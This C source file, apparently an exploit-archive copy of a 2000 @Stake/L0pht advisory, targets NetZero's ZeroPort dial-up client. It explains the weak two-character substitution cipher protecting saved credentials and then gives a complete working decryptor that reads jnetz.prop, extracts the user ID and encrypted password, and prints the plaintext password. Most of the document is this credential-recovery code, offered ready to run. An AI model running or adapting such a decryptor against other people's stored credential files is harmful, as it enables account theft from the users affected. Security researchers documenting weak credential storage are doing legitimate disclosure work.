202 lines
No EOL
5.2 KiB
C
202 lines
No EOL
5.2 KiB
C
// source: https://www.securityfocus.com/bid/1483/info
|
|
|
|
Netzero is a free internet service provider which requires its users to run the application ZeroPort in order to log onto the network. The username and password is stored locally in a text file called id.dat and is inadequately encrypted. The weakly encrypted username and password may also be stored in jnetz.prop if the option "Save Password" is enabled.
|
|
|
|
If a malicious user has access to the aforementioned files, they may decrypt the username and password using the exploit provided by Brian Carrier <bcarrier@atstake.com> or by using a simple substitution cipher.
|
|
|
|
Taken from the @Stake/L0pht advisory, Brian Carrier explains how to decrypt the username and password:
|
|
|
|
The classical substitution cipher is a 1-to-1 mapping between
|
|
characters where each plaintext character is replaced by one ciphertext
|
|
character. For example, let P_i be the plaintext character in location
|
|
'i' and C_j be the ciphertext character in location 'j', then C_i is the
|
|
character that P_i maps to.
|
|
|
|
The NetZero substitution cipher replaces each plaintext character by
|
|
two ciphertext characters, but the two ciphertext characters are not
|
|
stored together. When substituting character P_i of a password of length
|
|
'n', the first ciphertext character is C_i and the second character is
|
|
C_n+i.
|
|
|
|
The two ciphertext characters are derived from the following table:
|
|
| 1 a M Q f 7 g T 9 4 L W e 6 y C
|
|
--+----------------------------------
|
|
g | ` a b c d e f g h i j k l m n o
|
|
T | p q r s t u v w x y z { | } ~
|
|
f | @ A B C D E F G H I J K L M N O
|
|
7 | P Q R S T U V W X Y Z [ \ ] ^ _
|
|
Q | 0 1 2 3 4 5 6 7 8 9 : ; < = > ?
|
|
M | SP ! " # $ % & ' ( ) * + , - . /
|
|
|
|
The characters inside the table represent the ASCII plaintext characters
|
|
and SP represents a space.
|
|
|
|
When encrypting a string, P, of length 'n', find each character in the
|
|
table and place the column header into C_i and place the row header into
|
|
C_n+i.
|
|
|
|
For example:
|
|
E(a) = ag
|
|
E(aa) = aagg
|
|
E(aqAQ1!) = aaaaaagTf7QM
|
|
E(`abcdefghijklmno) = 1aMQf7gT94LWe6yCgggggggggggggggg
|
|
|
|
When decrypting a string, C, of length '2n', then P_i will be the
|
|
element in the above table where the column headed by C_i and the row
|
|
headed by C_n+i intersect.
|
|
|
|
For example:
|
|
D(af) = A
|
|
D(aaff) = AA
|
|
D(aaMMQQfgfgfg) = AaBbCc
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
#define UID_SIZE 64
|
|
#define PASS_CIPHER_SIZE 128
|
|
#define PASS_PLAIN_SIZE 64
|
|
#define BUF_SIZE 256
|
|
|
|
const char decTable[6][16] = {
|
|
{'`','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o'},
|
|
{'p','q','r','s','t','u','v','w','x','y','z','{','|','}','~',0},
|
|
{'@','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O'},
|
|
{'P','Q','R','S','T','U','V','W','X','Y','Z','[','\\',']','^','_'},
|
|
{'0','1','2','3','4','5','6','7','8','9',':',';','<','=','>','?'},
|
|
{' ','!','"','#','$','%','&','\'','(',')','*','+',',','-','.','/'}
|
|
};
|
|
|
|
int nz_decrypt(char cCipherPass[PASS_CIPHER_SIZE],
|
|
char cPlainPass[PASS_PLAIN_SIZE])
|
|
{
|
|
int passLen, i, idx1, idx2;
|
|
passLen = strlen(cCipherPass)/2;
|
|
|
|
if (passLen > PASS_PLAIN_SIZE)
|
|
{
|
|
printf("Error: Plain text array too small\n");
|
|
return 1;
|
|
}
|
|
|
|
for (i = 0; i < passLen; i++)
|
|
{
|
|
switch(cCipherPass[i])
|
|
{
|
|
case '1':
|
|
idx2 = 0; break;
|
|
case 'a':
|
|
idx2 = 1; break;
|
|
case 'M':
|
|
idx2 = 2; break;
|
|
case 'Q':
|
|
idx2 = 3; break;
|
|
case 'f':
|
|
idx2 = 4; break;
|
|
case '7':
|
|
idx2 = 5; break;
|
|
case 'g':
|
|
idx2 = 6; break;
|
|
case 'T':
|
|
idx2 = 7; break;
|
|
case '9':
|
|
idx2 = 8; break;
|
|
case '4':
|
|
idx2 = 9; break;
|
|
case 'L':
|
|
idx2 = 10; break;
|
|
case 'W':
|
|
idx2 = 11; break;
|
|
case 'e':
|
|
idx2 = 12; break;
|
|
case '6':
|
|
idx2 = 13; break;
|
|
case 'y':
|
|
idx2 = 14; break;
|
|
case 'C':
|
|
idx2 = 15; break;
|
|
default:
|
|
printf("Error: Unknown Cipher Text index: %c\n", cCipherPass[i]);
|
|
return 1;
|
|
break;
|
|
}
|
|
|
|
switch(cCipherPass[i+passLen])
|
|
{
|
|
case 'g':
|
|
idx1 = 0; break;
|
|
case 'T':
|
|
idx1 = 1; break;
|
|
case 'f':
|
|
idx1 = 2; break;
|
|
case '7':
|
|
idx1 = 3; break;
|
|
case 'Q':
|
|
idx1 = 4; break;
|
|
case 'M':
|
|
idx1 = 5; break;
|
|
default:
|
|
printf("Error: Unknown Cipher Text Set: %c\n",
|
|
cCipherPass[i+passLen]);
|
|
return 1;
|
|
break;
|
|
}
|
|
|
|
cPlainPass[i] = decTable[idx1][idx2];
|
|
}
|
|
cPlainPass[i] = 0;
|
|
|
|
return 0;
|
|
}
|
|
|
|
int main(void)
|
|
{
|
|
FILE *hParams;
|
|
char cBuffer[BUF_SIZE], cUID[UID_SIZE];
|
|
char cCipherPass[PASS_CIPHER_SIZE], cPlainPass[PASS_PLAIN_SIZE];
|
|
int done = 2;
|
|
|
|
printf("\nNet Zero Password Decryptor\n");
|
|
printf("Brian Carrier [bcarrier@atstake.com]\n");
|
|
printf("@Stake L0pht Research Labs\n");
|
|
printf("http://www.atstake.com\n\n");
|
|
|
|
if ((hParams = fopen("jnetz.prop","r")) == NULL)
|
|
{
|
|
printf("Unable to find jnetz.prop file\n");
|
|
return 1;
|
|
}
|
|
|
|
while ((fgets(cBuffer, BUF_SIZE, hParams) != NULL) && (done > 0))
|
|
{
|
|
if (strncmp(cBuffer, "ProfUID=", 8) == 0)
|
|
{
|
|
done--;
|
|
strncpy(cUID, cBuffer + 8, UID_SIZE);
|
|
printf("UserID: %s", cUID);
|
|
}
|
|
|
|
if (strncmp(cBuffer, "ProfPWD=", 8) == 0)
|
|
{
|
|
done--;
|
|
strncpy(cCipherPass, cBuffer + 8, PASS_CIPHER_SIZE);
|
|
printf("Encrypted Password: %s", cCipherPass);
|
|
|
|
if (nz_decrypt(cCipherPass, cPlainPass) != 0)
|
|
return 1;
|
|
else
|
|
printf("Plain Text Password: %s\n", cPlainPass);
|
|
}
|
|
|
|
}
|
|
|
|
fclose(hParams);
|
|
|
|
if (done > 0)
|
|
{
|
|
printf("Invalid jnetz.prop file\n");
|
|
return 1;
|
|
} else {
|
|
return 0;
|
|
}
|
|
} |